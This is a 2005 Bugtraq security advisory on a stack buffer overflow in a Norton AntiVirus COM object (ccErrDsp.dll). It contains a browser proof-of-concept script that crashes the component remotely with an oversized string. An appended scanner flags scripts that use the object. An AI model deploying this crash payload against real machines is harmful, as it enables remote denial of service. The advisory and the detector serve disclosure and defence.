
Bugtraq mailing list archives


All Symantec Products All Versions Until 2005 - Remote Stack Buffer Overflow


From: "Rafel Ivgi, The-Insider" <theinsider () 012 net il>
Date: Thu, 06 Jan 2005 09:20:52 +0200

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~Application:    All Symantec Products All Versions Until 2005Vendors:http://www.symantec.com/nav/nav_pro/Platforms:        WindowsBug:                 Stack Buffer OverflowRisk:                Low - Crash - Not ExploitableExploitation:     Remote with browserDate:               10 Apr 2004Author:             Rafel Ivgi, The-Insidere-mail:              the_insider () mail comweb:http://theinsider.deep-ice.com~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~1) Introduction2) Bugs3) The Code~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~===============1) Introduction===============Symantec's Norton AntiVirus™ 2004 Professional is the world’s most trustedantivirus solution with advanced protection. It protects email, instantmessages,and other files by removing viruses automatically. Expanded threat detectionalertsthe user to spyware and similar hacking programs. It also supplies advancedtools fordata recovery and secure file deletion and a license for two computers.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~======2) Bug======Symantec Norton AntiVirus 2004 installs many DLLs(Dynamic Link Library)and COM(Component Object Model) objects. 
One of its DLL's "ccErrDsp.dll"Which is by the default installation options located at :C:\Program Files\Common Files\Symantec Shared\ccErrDsp.dll"ccErrDsp.dll" registers "CcErrDsp.ErrorDisplay.1"  COM Object.After Symantec Norton AntiVirus 2004 was used, this object can be createdLocaly & Remotely!For Example:Set symkiller = CreateObject("CcErrDsp.ErrorDisplay.1" )The vulnerability appears in the "sProduct" parameter at the "DisplayError"function of the object.The "DisplayError" recieves the following parameters:DisplayError(                        [in] long nParentWnd,                        [in] int nModuleId,                        [in] int nErrorId,                        [in] BSTR sCaption,                        [in] BSTR sErrorText,                        [in] BSTR sProduct,                        [in] BSTR sVersion,                        [in, optional] VARIANT varKeyArray,                        [in, optional] VARIANT varValueArray,                        [out, retval] VARIANT_BOOL* pRet);Which means that the following assignment:object.DisplayError(1,1,1,[STR <=255],[STR <=255],[Really Long String -'A'>521950],[STR <=255]);Will cause a Stack Buffer Overflow, which does not allow code execution.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~===========3) The Code===========This is Proof Of Concept Code:------------------- CUT HERE 
-------------------<script>a="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";b="aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa";for (i=0;i<2000;i++) {a= a + b;}symkiller=new 
ActiveXObject("CcErrDsp.ErrorDisplay.1" );symkiller.DisplayError(1,1,1,b,b,a,b);</script>------------------- CUT HERE -------------------~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~---Rafel Ivgi, The-Insiderhttp://theinsider.deep-ice.com"Only the one who sees the invisible , Can do the Impossible."
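
An added example, not part of the original advisory or any vendor tooling: a static check that a content filter could run over HTML or script text to flag instantiation of the COM object named above and any use of its DisplayError method. The function name, the sample input and the choice to match the ProgID with or without a version suffix are assumptions; the advisory lists only "CcErrDsp.ErrorDisplay.1".

```javascript
// ProgID from the advisory, lower-cased because ProgIDs are case-insensitive.
// Matching it with or without a ".N" version suffix is an assumption.
const PROGID_PREFIX = "ccerrdsp.errordisplay";

// JScript `x = new ActiveXObject("...")` and VBScript `Set x = CreateObject("...")`.
// Variable names containing `$` are not captured, but the instantiation is still reported.
const CREATE =
  /(?:\b([A-Za-z_]\w*)\s*=\s*)?(?:new\s+ActiveXObject|CreateObject)\s*\(\s*(["'])(.*?)\2\s*\)/gi;

function scanForErrorDisplay(content) {
  const findings = [];
  for (const m of content.matchAll(CREATE)) {
    const progId = m[3].trim();
    const lower = progId.toLowerCase();
    // Exact ProgID or ProgID plus version suffix only; similar names are ignored.
    if (lower !== PROGID_PREFIX && !lower.startsWith(PROGID_PREFIX + ".")) continue;

    const variable = m[1] || null;
    let callsDisplayError = false;
    if (variable) {
      // VBScript may call the method without parentheses, so only the name is matched.
      const call = new RegExp("\\b" + variable + "\\s*\\.\\s*DisplayError\\b", "i");
      callsDisplayError = call.test(content);
    }
    findings.push({
      progId,
      variable,
      line: content.slice(0, m.index).split("\n").length, // 1-based line of the match
      callsDisplayError,
    });
  }
  return findings;
}

// Constructed sample input: one unrelated COM object, one use of the advisory's
// ProgID with short, harmless arguments.
const SAMPLE = [
  '<script>var fso = new ActiveXObject("Scripting.FileSystemObject");</script>',
  '<script language="VBScript">Set errUi = CreateObject("ccerrdsp.errordisplay.1" )',
  'errUi.DisplayError 1,1,1,"c","t","p","v"</script>',
].join("\n");

console.log(scanForErrorDisplay(SAMPLE));
```

This is a literal-string match only; script that assembles the ProgID at run time will not be flagged.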
